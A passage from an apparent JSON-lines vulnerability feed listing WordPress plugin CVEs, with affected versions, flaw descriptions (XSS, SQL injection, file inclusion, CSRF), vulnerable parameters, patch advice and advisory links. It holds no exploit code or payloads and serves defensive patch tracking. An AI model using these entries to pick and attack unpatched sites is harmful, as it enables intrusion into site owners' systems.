version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/releases\\\/tag\\\/3.7.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/releases\\\/tag\\\/3.7.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.241317\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.241317\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/commit\\\/13c30af721d3f989caac72dd0f56cf0dc40fad7e\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-ultimate-csv-importer\\\/commit\\\/13c30af721d3f989caac72dd0f56cf0dc40fad7e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241317\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241317\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2023","slug":"custom-404-pro","versionEndExcluding":"3.7.3","description":"The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8859843a-a8c2-4f7a-8372-67049d6ea317\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8859843a-a8c2-4f7a-8372-67049d6ea317\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125099","slug":"i-recommend-this","versionImpact":"3.7.2","versionEndExcluding":"3.7.3","description":"A vulnerability has been found in I Recommend This Plugin up to 3.7.2 on WordPress and classified as critical. Affected by this vulnerability is an unknown functionality of the file dot-irecommendthis.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 3.7.3 is able to address this issue. The name of the patch is 058b3ef5c7577bf557557904a53ecc8599b13649. It is recommended to upgrade the affected component. The identifier VDB-226309 was assigned to this vulnerability.","recommendation":"Update to version 3.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/releases\\\/tag\\\/3.7.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/releases\\\/tag\\\/3.7.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226309\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226309\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.226309\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.226309\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/commit\\\/058b3ef5c7577bf557557904a53ecc8599b13649\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/i-recommend-this\\\/commit\\\/058b3ef5c7577bf557557904a53ecc8599b13649\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4390","slug":"ays-popup-box","versionEndExcluding":"3.7.2","description":"The Popup box WordPress plugin before 3.7.2 does not sanitize and escape some Popup fields, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9fd2eb81-185d-4d42-8acf-925664b7cb2f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9fd2eb81-185d-4d42-8acf-925664b7cb2f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0685","slug":"ninja-forms","versionImpact":"3.7.1","versionEndExcluding":"3.7.2","description":"The Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028929\\\/ninja-forms\\\/trunk\\\/includes\\\/Admin\\\/UserDataRequests.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028929\\\/ninja-forms\\\/trunk\\\/includes\\\/Admin\\\/UserDataRequests.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4446","slug":"content-views-query-and-display-post-page","versionImpact":"3.7.1","versionEndExcluding":"3.7.2","description":"The Content Views \u2013 Post Grid & Filter, Recent Posts, Category Posts, & More (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pagingType\u2019 parameter in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65504747-7f1b-43f9-be4d-48b9547e7c45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65504747-7f1b-43f9-be4d-48b9547e7c45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/content-views-query-and-display-post-page\\\/tags\\\/3.7.1\\\/includes\\\/html.php#L803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/content-views-query-and-display-post-page\\\/tags\\\/3.7.1\\\/includes\\\/html.php#L803\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50828","slug":"ultimate-dashboard","versionEndExcluding":"3.7.12","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard \u2013 Custom WordPress Dashboard allows Stored XSS.This issue affects Ultimate Dashboard \u2013 Custom WordPress Dashboard: from n\/a through 3.7.11.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-dashboard\\\/wordpress-ultimate-dashboard-plugin-3-7-11-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-dashboard\\\/wordpress-ultimate-dashboard-plugin-3-7-11-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9233","slug":"gs-logo-slider","versionImpact":"3.7.0","versionEndExcluding":"3.7.1","description":"The Logo Slider  WordPress plugin before 3.7.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a466cea4-0ae5-44a1-9e12-bd5dbecde2f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a466cea4-0ae5-44a1-9e12-bd5dbecde2f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4800","slug":"dologin","versionEndExcluding":"3.7.1","description":"The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eae1434-8c7a-4291-912d-a4a07b73ee56\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eae1434-8c7a-4291-912d-a4a07b73ee56\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6228","slug":"sina-extension-for-elementor","versionImpact":"3.7.0","versionEndExcluding":"3.7.1","description":"The Sina Extension for Elementor (Header Builder, Footer Builter, Theme Builder, Slider, Gallery, Form, Modal, Data Table Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `Sina Posts`, `Sina Blog Post` and `Sina Table` widgets in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2066\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2066\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/theme_builder\\\/sina-posts.php#L1879\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.7.0\\\/widgets\\\/theme_builder\\\/sina-posts.php#L1879\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd929710-bdb4-42e1-b409-df41adc22392?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd929710-bdb4-42e1-b409-df41adc22392?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13363","slug":"adthrive-ads","versionImpact":"3.6.3","versionEndExcluding":"3.7.1","description":"The Raptive Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'poc' parameter in all versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\\\/eyereturn.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adthrive-ads\\\/trunk\\\/components\\\/static-files\\\/partials\\\/eyereturn\\\/eyereturn.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d535b3-ad52-4322-988e-7d560dbfe3a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d535b3-ad52-4322-988e-7d560dbfe3a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0375","slug":"easy-affiliate-links","versionEndExcluding":"3.7.1","description":"The Easy Affiliate Links WordPress plugin before 3.7.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915d6add-d3e2-4ced-969e-9523981ac886\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915d6add-d3e2-4ced-969e-9523981ac886\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4670","slug":"all-in-one-video-gallery","versionImpact":"3.6.5","versionEndExcluding":"3.7.0","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.5 via the aiovg_search_form shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2793547-5edf-4d2a-bc3b-fcaeed62963d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2793547-5edf-4d2a-bc3b-fcaeed62963d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085217\\\/all-in-one-video-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085217\\\/all-in-one-video-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5626","slug":"intelly-related-posts","versionImpact":"3.6.0","versionEndExcluding":"3.7.0","description":"The Inline Related Posts WordPress plugin before 3.7.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b03f450-4982-4f6c-a6f1-f7e85b1deec1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b03f450-4982-4f6c-a6f1-f7e85b1deec1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0506","slug":"rise-blocks","versionImpact":"3.6","versionEndExcluding":"3.7","description":"The Rise Blocks \u2013 A Complete Gutenberg Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the titleTag parameter in all versions up to, and including, 3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rise-blocks\\\/tags\\\/3.6\\\/classes\\\/blocks\\\/site-identity.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rise-blocks\\\/tags\\\/3.6\\\/classes\\\/blocks\\\/site-identity.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec012e7-b997-466e-8676-8e9467473eae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec012e7-b997-466e-8676-8e9467473eae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2578","slug":"buymeacoffee","versionEndExcluding":"3.7","description":"The Buy Me a Coffee WordPress plugin before 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dad1c0d-bcf9-4486-bd8e-387ac8e6c892\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dad1c0d-bcf9-4486-bd8e-387ac8e6c892\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4631","slug":"dologin","versionEndExcluding":"3.7","description":"The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28613fc7-1400-4553-bcc3-24df1cee418e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28613fc7-1400-4553-bcc3-24df1cee418e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4549","slug":"dologin","versionEndExcluding":"3.7","description":"The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aebead0-0eab-4d4e-8ceb-8fea0760374f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aebead0-0eab-4d4e-8ceb-8fea0760374f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5980","slug":"bsk-gravityforms-blacklist","versionImpact":"3.6.3","versionEndExcluding":"3.7","description":"The BSK Forms Blacklist WordPress plugin before 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b621261b-ae18-4853-9ace-7b773810529a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b621261b-ae18-4853-9ace-7b773810529a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4995","slug":"embed-calendly-scheduling","versionImpact":"3.6","versionEndExcluding":"3.7","description":"The Embed Calendly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'calendly' shortcode in versions up to, and including, 3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1bf83df-7a1f-4572-9c8d-1013750d51d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1bf83df-7a1f-4572-9c8d-1013750d51d7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-calendly-scheduling\\\/tags\\\/3.6\\\/includes\\\/embed.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-calendly-scheduling\\\/tags\\\/3.6\\\/includes\\\/embed.php#L140\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4290","slug":"cyr3lat","versionImpact":"3.5","versionEndExcluding":"3.7","description":"The Cyr to Lat plugin for WordPress is vulnerable to authenticated SQL Injection via the 'ctl_sanitize_title' function in versions up to, and including, 3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This potentially allows authenticated users with the ability to add or modify terms or tags to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. A partial patch became available in version 3.6 and the issue was fully patched in version 3.7.","recommendation":"Update to version 3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cyr3lat\\\/trunk\\\/cyr-to-lat.php?rev=1117224#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cyr3lat\\\/trunk\\\/cyr-to-lat.php?rev=1117224#L69\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c29130-1b42-4edd-ad62-6f635e03ae31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c29130-1b42-4edd-ad62-6f635e03ae31?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36749","slug":"easy-testimonials","versionEndExcluding":"3.7","description":"The Easy Testimonials plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2370405%40easy-testimonials&new=2370405%40easy-testimonials&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2370405%40easy-testimonials&new=2370405%40easy-testimonials&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da49c2e-576c-490b-b812-96d15b6d2b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da49c2e-576c-490b-b812-96d15b6d2b1b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7716","slug":"gs-logo-slider","versionImpact":"3.6.8","versionEndExcluding":"3.6.9","description":"The Logo Slider  WordPress plugin before 3.6.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfa67c43-6f09-43f5-9fbe-32a98a82f548\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfa67c43-6f09-43f5-9fbe-32a98a82f548\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10533","slug":"wp-whatsapp","versionImpact":"3.6.8","versionEndExcluding":"3.6.9","description":"The WP Chat App plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the ajax_install_plugin() function in all versions up to, and including, 3.6.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the filebird plugin.","recommendation":"Update to version 3.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26f73bfe-f41a-4045-9d72-21181a9a704f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26f73bfe-f41a-4045-9d72-21181a9a704f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php#L206\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/tags\\\/3.6.7\\\/includes\\\/Cross.php#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-whatsapp\\\/tags\\\/3.6.7\\\/includes\\\/Cross.php#L206\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186930\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186930\\\/wp-whatsapp\\\/trunk\\\/includes\\\/Cross.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10675","slug":"affiliate-toolkit-starter","versionImpact":"3.6.7","versionEndExcluding":"3.6.8","description":"The affiliate-toolkit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 3.6.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192067%40affiliate-toolkit-starter&new=3192067%40affiliate-toolkit-starter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192067%40affiliate-toolkit-starter&new=3192067%40affiliate-toolkit-starter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f45afce1-cb37-4e7e-90b2-6ae1b6400376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f45afce1-cb37-4e7e-90b2-6ae1b6400376?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5252","slug":"fareharbor","versionImpact":"3.6.7","versionEndExcluding":"3.6.8","description":"The FareHarbor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.8, or a newer patched 